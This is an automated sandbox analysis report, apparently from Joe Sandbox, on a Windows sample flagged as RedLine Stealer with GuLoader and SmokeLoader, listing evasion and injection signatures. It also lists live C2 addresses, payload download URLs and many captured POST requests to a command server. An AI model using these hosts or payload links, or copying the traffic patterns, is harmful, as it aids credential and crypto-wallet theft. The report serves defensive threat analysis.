Windows Analysis Report fw8ex1BNek.exe

Overview

General Information

Sample Name: fw8ex1BNek.exe
Analysis ID: 542025
MD5: 6a4b078a500c92ae7bbf3563a49fb100
SHA1: 03005f11d47b9ef868df361c1603f33a9cee55fd
SHA256: a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
Tags: exe, RedLineStealer

Detection

GuLoader RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Antivirus detection for URL or domain
Source: http://45.9.20.240:7769/Igno.exe Avira URL Cloud: Label: malware
Source: http://185.112.83.8/install3.exe Avira URL Cloud: Label: malware
Source: http://galala.ru/upload/ Avira URL Cloud: Label: malware
Source: http://witra.ru/upload/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp Malware Configuration Extractor: RedLine {"C2 url": "45.9.20.240:46257"}
Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}
Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}
Multi AV Scanner detection for submitted file
Source: fw8ex1BNek.exe Virustotal: Detection: 39%
Source: fw8ex1BNek.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for domain / URL
Source: rcacademy.at Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\DB56.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\acgvitw ReversingLabs: Detection: 37%
Machine Learning detection for sample
Source: fw8ex1BNek.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\acgvitw Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4924.exe Joe Sandbox ML: detected

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack
Uses 32bit PE files
Source: fw8ex1BNek.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\fw8ex1BNek.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2
Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: www.bastinscustomfab.com
Source: C:\Windows\explorer.exe Domain query: rcacademy.at
Source: C:\Windows\explorer.exe Domain query: bastinscustomfab.com
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 7769
Source: unknown Network traffic detected: HTTP traffic on port 7769 -> 49850
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.112.83.8/InjectHollowing.bin
Source: Malware configuration extractor URLs: http://rcacademy.at/upload/
Source: Malware configuration extractor URLs: http://e-lanpengeonline.com/upload/
Source: Malware configuration extractor URLs: http://vjcmvz.cn/upload/
Source: Malware configuration extractor URLs: http://galala.ru/upload/
Source: Malware configuration extractor URLs: http://witra.ru/upload/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 17 Dec 2021 07:07:38 GMTAccept-Ranges: bytesETag: "8d927cc614f3d71:0"Server: Microsoft-IIS/10.0Date: Sat, 18 Dec 2021 14:32:43 GMTContent-Length: 94424
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uexckctm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydnswljr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyedgkcsgg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rydxhqucb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwahbovc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvqqrvitjv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pawqkjnqlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbely.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfquy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svlbtjow.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrenwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kliyespolk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjmjrvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvgdwnrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqvtkcroe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wayrnqsako.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayamwyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gffroy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysuckj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmchuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tnsiunfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydbdqcx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myjlsdvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfeippj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgwuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxkwka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: rcacademy.at
Source: global traffic HTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbswig.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmxlxoqtyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwwgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwrqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hetky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wadndxm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whrkpnnn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udjjtqdogg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyvwwwlnbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwrfdbfbaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: rcacademy.at
Source: global traffic HTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvyrwnlgbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbwucidikt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwmsuk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkybqrxqpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaqwoemuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyexyommxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jawmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xefimpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dppsna.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: rcacademy.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DEDIPATH-LLCUS
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.9.20.240
Source: Joe Sandbox View IP Address: 190.117.75.91
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49850 -> 45.9.20.240:7769
Source: global traffic TCP traffic: 192.168.2.6:49865 -> 86.107.197.138:38133
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 8CE5.exe.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 8CE5.exe.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: explorer.exe, 00000005.00000000.372654179.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403688528.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 8CE5.exe.5.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
